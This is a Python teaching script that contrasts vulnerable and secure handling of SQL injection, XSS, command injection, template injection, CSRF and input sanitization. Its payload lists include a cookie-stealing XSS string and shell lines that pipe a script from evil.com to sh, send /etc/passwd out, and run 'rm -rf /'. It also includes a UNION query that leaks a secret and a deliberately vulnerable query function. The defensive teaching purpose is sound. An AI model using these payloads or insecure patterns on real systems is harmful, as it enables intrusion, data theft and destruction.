injection_demo.py

Download
python 656 lines 20.1 KB
  1"""
  2Injection Attack Prevention Demo
  3================================
  4
  5Educational demonstration of injection vulnerabilities and their defenses:
  6- SQL Injection: vulnerable vs parameterized (sqlite3 in-memory)
  7- XSS: encoding/escaping with html.escape
  8- Command Injection: vulnerable os.system vs safe subprocess
  9- Template Injection: why f-strings in templates are dangerous
 10- CSRF token generation and validation
 11- Input sanitization utilities
 12
 13All examples are DEFENSIVE - demonstrating how to identify and
 14prevent injection attacks. Uses only Python standard library.
 15"""
 16
 17import html
 18import hashlib
 19import hmac
 20import json
 21import os
 22import re
 23import secrets
 24import shlex
 25import sqlite3
 26import subprocess
 27import time
 28from urllib.parse import quote as url_quote
 29
 30print("=" * 65)
 31print("  Injection Attack Prevention Demo")
 32print("=" * 65)
 33print()
 34
 35
 36# ============================================================
 37# Section 1: SQL Injection - In Depth
 38# ============================================================
 39
 40print("-" * 65)
 41print("  Section 1: SQL Injection Prevention")
 42print("-" * 65)
 43
 44# Setup database
 45conn = sqlite3.connect(":memory:")
 46cur = conn.cursor()
 47cur.execute("""
 48    CREATE TABLE products (
 49        id INTEGER PRIMARY KEY,
 50        name TEXT,
 51        price REAL,
 52        category TEXT
 53    )
 54""")
 55cur.executemany(
 56    "INSERT INTO products (name, price, category) VALUES (?, ?, ?)",
 57    [
 58        ("Laptop", 999.99, "electronics"),
 59        ("Mouse", 29.99, "electronics"),
 60        ("Desk Chair", 299.99, "furniture"),
 61        ("Notebook", 4.99, "stationery"),
 62        ("Monitor", 449.99, "electronics"),
 63    ],
 64)
 65
 66cur.execute("""
 67    CREATE TABLE admin_settings (
 68        key TEXT PRIMARY KEY,
 69        value TEXT
 70    )
 71""")
 72cur.execute(
 73    "INSERT INTO admin_settings VALUES (?, ?)",
 74    ("secret_key", "SUPER_SECRET_ADMIN_KEY_12345"),
 75)
 76conn.commit()
 77
 78print("""
 79  SQL Injection Types:
 80  1. Classic: ' OR '1'='1
 81  2. UNION-based: ' UNION SELECT ... --
 82  3. Blind: AND 1=1 (boolean) or AND SLEEP(5) (time-based)
 83  4. Second-order: stored payload executed later
 84""")
 85
 86# --- Classic SQL Injection ---
 87print("  -- Classic SQL Injection --")
 88
 89
 90def search_products_vulnerable(category: str) -> list:
 91    """VULNERABLE: User input directly in SQL."""
 92    query = f"SELECT name, price FROM products WHERE category = '{category}'"
 93    return cur.execute(query).fetchall()
 94
 95
 96def search_products_secure(category: str) -> list:
 97    """SECURE: Parameterized query."""
 98    return cur.execute(
 99        "SELECT name, price FROM products WHERE category = ?",
100        (category,),
101    ).fetchall()
102
103
104# Normal usage
105print(f"\n  Normal search: category='electronics'")
106results = search_products_secure("electronics")
107for name, price in results:
108    print(f"    {name}: ${price}")
109print()
110
111# UNION-based injection: extract data from other tables
112union_payload = "' UNION SELECT key, value FROM admin_settings --"
113print(f"  UNION injection payload: {union_payload}")
114
115print("  -- Vulnerable --")
116try:
117    results = search_products_vulnerable(union_payload)
118    for name, price in results:
119        print(f"    {name}: {price}")
120    print("    ^^ Admin secret key leaked!")
121except Exception as e:
122    print(f"    Error: {e}")
123
124print("  -- Secure --")
125results = search_products_secure(union_payload)
126print(f"    Results: {results}  (empty - injection treated as literal string)")
127print()
128
129# --- Blind SQL Injection ---
130print("  -- Blind SQL Injection Concept --")
131print("""
132  Blind injection infers data through true/false responses:
133
134  Payload: electronics' AND (SELECT length(value) FROM admin_settings
135           WHERE key='secret_key') > 10 --
136
137  If results are returned -> condition is true -> length > 10
138  If no results          -> condition is false -> length <= 10
139
140  Attacker narrows down character by character.
141  Defense: ALWAYS use parameterized queries.
142""")
143
144# --- Second-order injection ---
145print("  -- Second-Order Injection --")
146print("""
147  Stored payload that triggers on a later query:
148
149  Step 1: Register username = "admin'--"
150  Step 2: Password reset uses:
151    UPDATE users SET password = ? WHERE username = '<stored_name>'
152    Becomes: WHERE username = 'admin'--'  (updates admin's password!)
153
154  Defense: Parameterize ALL queries, even with "trusted" DB data.
155""")
156print()
157
158
159# ============================================================
160# Section 2: XSS (Cross-Site Scripting) Prevention
161# ============================================================
162
163print("-" * 65)
164print("  Section 2: XSS Prevention")
165print("-" * 65)
166
167print("""
168  XSS Types:
169  1. Reflected: payload in URL/request, reflected in response
170  2. Stored: payload saved to DB, rendered to other users
171  3. DOM-based: payload manipulates client-side JavaScript
172""")
173
174
175def render_comment_vulnerable(username: str, comment: str) -> str:
176    """VULNERABLE: No escaping - XSS possible."""
177    return f"<div class='comment'><b>{username}</b>: {comment}</div>"
178
179
180def render_comment_secure(username: str, comment: str) -> str:
181    """SECURE: HTML-escaped output prevents XSS."""
182    safe_user = html.escape(username, quote=True)
183    safe_comment = html.escape(comment, quote=True)
184    return f"<div class='comment'><b>{safe_user}</b>: {safe_comment}</div>"
185
186
187# Normal content
188print("\n  Normal comment:")
189normal_user = "Alice"
190normal_comment = "Great product! 5 stars."
191print(f"    Secure:     {render_comment_secure(normal_user, normal_comment)}")
192print()
193
194# XSS payloads
195xss_payloads = [
196    ("<script>alert('XSS')</script>", "Basic script injection"),
197    ('<img src=x onerror="alert(1)">', "Event handler injection"),
198    ('"><script>document.location="http://evil.com/?c="+document.cookie</script>',
199     "Cookie theft"),
200    ("javascript:alert(1)", "JavaScript URI"),
201    ('<svg onload="alert(1)">', "SVG event handler"),
202]
203
204print("  XSS Payload Escaping:")
205for payload, desc in xss_payloads:
206    escaped = html.escape(payload, quote=True)
207    print(f"\n    Attack: {desc}")
208    print(f"    Raw:     {payload[:60]}")
209    print(f"    Escaped: {escaped[:60]}")
210print()
211
212# Context-specific encoding
213print("  -- Context-Specific Encoding --")
214
215
216def encode_for_html_attr(value: str) -> str:
217    """Encode for use in HTML attributes."""
218    return html.escape(value, quote=True)
219
220
221def encode_for_url(value: str) -> str:
222    """Encode for use in URLs."""
223    return url_quote(value, safe="")
224
225
226def encode_for_javascript(value: str) -> str:
227    """Encode for use in JavaScript string context."""
228    # Escape characters that could break out of a JS string
229    replacements = {
230        "\\": "\\\\", "'": "\\'", '"': '\\"',
231        "\n": "\\n", "\r": "\\r", "<": "\\x3c",
232        ">": "\\x3e", "&": "\\x26",
233    }
234    for old, new in replacements.items():
235        value = value.replace(old, new)
236    return value
237
238
239test_input = '<script>alert("xss")</script>'
240print(f"  Input:        {test_input}")
241print(f"  HTML attr:    {encode_for_html_attr(test_input)}")
242print(f"  URL:          {encode_for_url(test_input)}")
243print(f"  JavaScript:   {encode_for_javascript(test_input)}")
244print()
245
246
247# ============================================================
248# Section 3: Command Injection Prevention
249# ============================================================
250
251print("-" * 65)
252print("  Section 3: Command Injection Prevention")
253print("-" * 65)
254
255print("""
256  VULNERABLE: os.system(), subprocess with shell=True
257  SECURE:     subprocess.run() with list args, shell=False
258""")
259
260
261def ping_host_vulnerable(host: str) -> str:
262    """
263    VULNERABLE: Command injection via os.system.
264    DO NOT use in production - shown for educational purposes only.
265    """
266    # An attacker could pass: "google.com; cat /etc/passwd"
267    command = f"echo '[SIMULATED] ping -c 1 {host}'"
268    return f"    Constructed command: {command}"
269
270
271def ping_host_secure(host: str) -> str:
272    """SECURE: Using subprocess with argument list (no shell)."""
273    # Validate input first
274    if not re.match(r"^[a-zA-Z0-9.\-]+$", host):
275        return f"    Invalid hostname: {host}"
276
277    # Use list form - no shell interpretation
278    cmd = ["echo", "[SIMULATED] ping", "-c", "1", host]
279    return f"    Constructed command: {cmd}"
280
281
282# Normal input
283print("\n  Normal input: 'google.com'")
284print(f"  Vulnerable: {ping_host_vulnerable('google.com')}")
285print(f"  Secure:     {ping_host_secure('google.com')}")
286print()
287
288# Malicious input
289malicious = "google.com; cat /etc/passwd"
290print(f"  Malicious input: '{malicious}'")
291print(f"  Vulnerable: {ping_host_vulnerable(malicious)}")
292print(f"    ^^ Shell interprets ';' as command separator!")
293print(f"  Secure:     {ping_host_secure(malicious)}")
294print()
295
296# Additional dangerous patterns
297print("  -- Dangerous Shell Patterns --")
298dangerous_inputs = [
299    ("$(whoami)", "Command substitution"),
300    ("`id`", "Backtick command substitution"),
301    ("| cat /etc/shadow", "Pipe injection"),
302    ("&& rm -rf /", "Command chaining"),
303    ("; curl http://evil.com/shell.sh | sh", "Remote code execution"),
304    ("$(curl evil.com/exfil?data=$(cat /etc/passwd))", "Data exfiltration"),
305]
306
307for payload, desc in dangerous_inputs:
308    validated = re.match(r"^[a-zA-Z0-9.\-]+$", payload) is not None
309    status = "PASS" if validated else "BLOCKED"
310    print(f"    [{status}] {desc}")
311    print(f"           Payload: {payload}")
312
313print()
314print("  Safe alternatives to shell commands:")
315print("    os.system()      -> subprocess.run([...], shell=False)")
316print("    os.popen()       -> subprocess.run([...], capture_output=True)")
317print("    shell=True       -> shell=False with list arguments")
318print("    String commands  -> shlex.split() or list construction")
319print()
320
321# shlex.quote for when shell=True is unavoidable
322print("  -- shlex.quote() for shell escaping --")
323user_filename = "my file; rm -rf /"
324safe_quoted = shlex.quote(user_filename)
325print(f"  Raw input:    {user_filename}")
326print(f"  shlex.quote:  {safe_quoted}")
327print(f"  (Wraps in single quotes, escapes internal quotes)")
328print()
329
330
331# ============================================================
332# Section 4: Template Injection
333# ============================================================
334
335print("-" * 65)
336print("  Section 4: Template Injection Prevention")
337print("-" * 65)
338
339print("""
340  Server-Side Template Injection (SSTI) occurs when user input
341  is embedded directly into a template engine's template string.
342
343  In Python, even f-strings can be dangerous if used with
344  user-controlled format strings.
345""")
346
347# --- Dangerous: f-string with user input ---
348print("  -- Dangerous: User-Controlled Format Strings --")
349
350
351def render_greeting_vulnerable(template_str: str, name: str) -> str:
352    """
353    VULNERABLE: User controls the template string.
354    An attacker could access object attributes.
355    """
356    # This is dangerous - user controls template_str
357    try:
358        return template_str.format(name=name, greeting="Hello")
359    except (KeyError, AttributeError, IndexError) as e:
360        return f"Error: {e}"
361
362
363def render_greeting_secure(name: str) -> str:
364    """SECURE: Template is hardcoded, only data varies."""
365    safe_name = html.escape(name)
366    return f"Hello, {safe_name}! Welcome back."
367
368
369# Normal usage
370print(f"\n  Normal: {render_greeting_secure('Alice')}")
371
372# Malicious template strings
373malicious_templates = [
374    ("{name.__class__.__mro__}", "Access class hierarchy"),
375    ("{name.__class__.__init__.__globals__}", "Access global variables"),
376    ("{greeting} {name} - {0}", "Positional argument access"),
377]
378
379print("\n  Template injection attempts (format string):")
380for template, desc in malicious_templates:
381    result = render_greeting_vulnerable(template, "Alice")
382    truncated = str(result)[:60]
383    print(f"    {desc}:")
384    print(f"      Template: {template}")
385    print(f"      Result:   {truncated}...")
386print()
387
388print("  Prevention:")
389print("    1. Never let users control template strings")
390print("    2. Use proper template engines with auto-escaping (Jinja2)")
391print("    3. Use sandboxed template environments")
392print("    4. Validate and sanitize all interpolated values")
393print()
394
395
396# ============================================================
397# Section 5: CSRF Token Generation and Validation
398# ============================================================
399
400print("-" * 65)
401print("  Section 5: CSRF (Cross-Site Request Forgery) Protection")
402print("-" * 65)
403
404print("""
405  CSRF tricks a user's browser into making unwanted requests
406  to a site where they're authenticated.
407
408  Defense: Include a secret token in forms that the attacker
409  cannot know or predict.
410""")
411
412
413class CSRFProtection:
414    """CSRF token generation and validation."""
415
416    def __init__(self, secret_key: str):
417        self.secret_key = secret_key.encode()
418
419    def generate_token(self, session_id: str) -> str:
420        """Generate a CSRF token tied to a user's session."""
421        # Token = HMAC(secret, session_id + timestamp)
422        timestamp = str(int(time.time()))
423        message = f"{session_id}:{timestamp}".encode()
424        signature = hmac.new(self.secret_key, message, hashlib.sha256).hexdigest()
425        # Token format: timestamp:signature
426        return f"{timestamp}:{signature}"
427
428    def validate_token(self, token: str, session_id: str,
429                       max_age: int = 3600) -> tuple[bool, str]:
430        """Validate a CSRF token."""
431        try:
432            parts = token.split(":")
433            if len(parts) != 2:
434                return False, "Invalid token format"
435
436            timestamp_str, signature = parts
437            timestamp = int(timestamp_str)
438
439            # Check expiration
440            if time.time() - timestamp > max_age:
441                return False, "Token expired"
442
443            # Recompute and compare
444            message = f"{session_id}:{timestamp_str}".encode()
445            expected = hmac.new(
446                self.secret_key, message, hashlib.sha256
447            ).hexdigest()
448
449            if hmac.compare_digest(signature, expected):
450                return True, "Valid"
451            return False, "Invalid signature"
452
453        except (ValueError, TypeError) as e:
454            return False, f"Validation error: {e}"
455
456
457csrf = CSRFProtection("my-app-secret-key")
458session_id = "sess_abc123"
459
460# Generate token
461token = csrf.generate_token(session_id)
462print(f"\n  Session ID:     {session_id}")
463print(f"  CSRF Token:     {token}")
464print()
465
466# Validate valid token
467valid, msg = csrf.validate_token(token, session_id)
468print(f"  Valid token:    {valid} ({msg})")
469
470# Validate with different session
471valid, msg = csrf.validate_token(token, "sess_different")
472print(f"  Wrong session:  {valid} ({msg})")
473
474# Validate tampered token
475tampered = token[:-5] + "XXXXX"
476valid, msg = csrf.validate_token(tampered, session_id)
477print(f"  Tampered token: {valid} ({msg})")
478print()
479
480# HTML form example
481print("  HTML form with CSRF token:")
482print(f"""    <form method="POST" action="/transfer">
483      <input type="hidden" name="csrf_token" value="{token}">
484      <input type="text" name="amount" value="100">
485      <button type="submit">Transfer</button>
486    </form>
487""")
488
489print("  CSRF Prevention Checklist:")
490print("    1. Include CSRF token in all state-changing forms")
491print("    2. Validate token server-side on every POST/PUT/DELETE")
492print("    3. Use SameSite=Lax or Strict cookies")
493print("    4. Verify Origin/Referer headers as additional check")
494print("    5. Use framework-provided CSRF protection (e.g., Flask-WTF)")
495print()
496
497
498# ============================================================
499# Section 6: Input Sanitization Utilities
500# ============================================================
501
502print("-" * 65)
503print("  Section 6: Input Sanitization Utilities")
504print("-" * 65)
505
506
507class Sanitizer:
508    """Collection of input sanitization methods."""
509
510    @staticmethod
511    def sanitize_html(text: str) -> str:
512        """Remove all HTML tags, keep text content."""
513        # Remove tags
514        clean = re.sub(r"<[^>]+>", "", text)
515        # Decode common entities
516        clean = html.unescape(clean)
517        # Remove null bytes
518        clean = clean.replace("\x00", "")
519        return clean.strip()
520
521    @staticmethod
522    def sanitize_filename(filename: str) -> str:
523        """Sanitize a filename to prevent path traversal."""
524        # Remove path separators
525        filename = os.path.basename(filename)
526        # Remove null bytes
527        filename = filename.replace("\x00", "")
528        # Remove dangerous characters
529        filename = re.sub(r'[<>:"/\\|?*]', "_", filename)
530        # Remove leading dots (hidden files)
531        filename = filename.lstrip(".")
532        # Limit length
533        name, ext = os.path.splitext(filename)
534        if len(name) > 200:
535            name = name[:200]
536        return name + ext if filename else "unnamed"
537
538    @staticmethod
539    def sanitize_sql_identifier(identifier: str) -> str:
540        """Sanitize a SQL identifier (table/column name).
541        For identifiers ONLY - use parameterized queries for values."""
542        # Allow only alphanumeric and underscore
543        if not re.match(r"^[a-zA-Z_][a-zA-Z0-9_]*$", identifier):
544            raise ValueError(f"Invalid SQL identifier: {identifier}")
545        # Check against reserved words (subset)
546        reserved = {"SELECT", "INSERT", "UPDATE", "DELETE", "DROP", "TABLE",
547                     "FROM", "WHERE", "AND", "OR", "UNION", "JOIN"}
548        if identifier.upper() in reserved:
549            raise ValueError(f"SQL reserved word: {identifier}")
550        return identifier
551
552    @staticmethod
553    def sanitize_log_entry(text: str) -> str:
554        """Sanitize text for safe logging (prevent log injection)."""
555        # Remove newlines (prevent log forging)
556        text = text.replace("\n", " ").replace("\r", " ")
557        # Remove ANSI escape codes
558        text = re.sub(r"\x1b\[[0-9;]*m", "", text)
559        # Limit length
560        return text[:500]
561
562
563sanitizer = Sanitizer()
564
565# HTML sanitization
566print("\n  -- HTML Sanitization --")
567html_tests = [
568    '<p>Hello <b>World</b></p>',
569    '<script>alert("XSS")</script>Normal text',
570    '<img src="x" onerror="steal()">Photo',
571    '<a href="javascript:void(0)">Click</a>',
572]
573for test in html_tests:
574    clean = sanitizer.sanitize_html(test)
575    print(f"    Input:  {test[:50]}")
576    print(f"    Clean:  {clean}")
577    print()
578
579# Filename sanitization
580print("  -- Filename Sanitization --")
581filename_tests = [
582    "normal_file.txt",
583    "../../../etc/passwd",
584    "file\x00.txt.exe",
585    '<script>alert("xss")</script>.html',
586    "...hidden_file.txt",
587    "CON.txt",  # Windows reserved name
588]
589for test in filename_tests:
590    clean = sanitizer.sanitize_filename(test)
591    print(f"    Input: {test!r:<40} -> {clean}")
592print()
593
594# SQL identifier sanitization
595print("  -- SQL Identifier Sanitization --")
596identifier_tests = [
597    "users",
598    "user_name",
599    "1invalid",
600    "DROP",
601    "valid_table_123",
602    "table; DROP TABLE users--",
603]
604for test in identifier_tests:
605    try:
606        clean = sanitizer.sanitize_sql_identifier(test)
607        print(f"    [{' OK '}] {test:<35} -> {clean}")
608    except ValueError as e:
609        print(f"    [BLOCK] {test:<35} -> {e}")
610print()
611
612# Log injection prevention
613print("  -- Log Injection Prevention --")
614log_tests = [
615    "Normal log entry",
616    "Fake entry\n2024-01-01 [INFO] Admin logged in",
617    "Data with \x1b[31mANSI colors\x1b[0m",
618]
619for test in log_tests:
620    clean = sanitizer.sanitize_log_entry(test)
621    print(f"    Input: {test!r}")
622    print(f"    Clean: {clean!r}")
623    print()
624
625
626# ============================================================
627# Section 7: Summary
628# ============================================================
629
630print("=" * 65)
631print("  Injection Prevention Summary")
632print("=" * 65)
633print("""
634  Attack Type    | Primary Defense           | Secondary Defense
635  ---------------+---------------------------+----------------------
636  SQL Injection  | Parameterized queries     | Input validation, WAF
637  XSS            | Output encoding/escaping  | CSP headers, sanitize
638  Command Inj.   | Avoid shell, use lists    | Input allowlist, shlex
639  Template Inj.  | Fixed templates, sandbox  | Auto-escaping engine
640  CSRF           | Anti-CSRF tokens          | SameSite cookies
641  Path Traversal | basename(), allowlist     | Chroot, sandboxing
642  Log Injection  | Strip newlines/ANSI       | Structured logging
643
644  Universal Principles:
645  1. Never trust user input
646  2. Validate input (allowlist > blocklist)
647  3. Encode/escape output for the target context
648  4. Use parameterized APIs (not string concatenation)
649  5. Apply defense in depth (multiple layers)
650  6. Keep dependencies updated
651  7. Use security linters (bandit, semgrep)
652""")
653
654# Cleanup
655conn.close()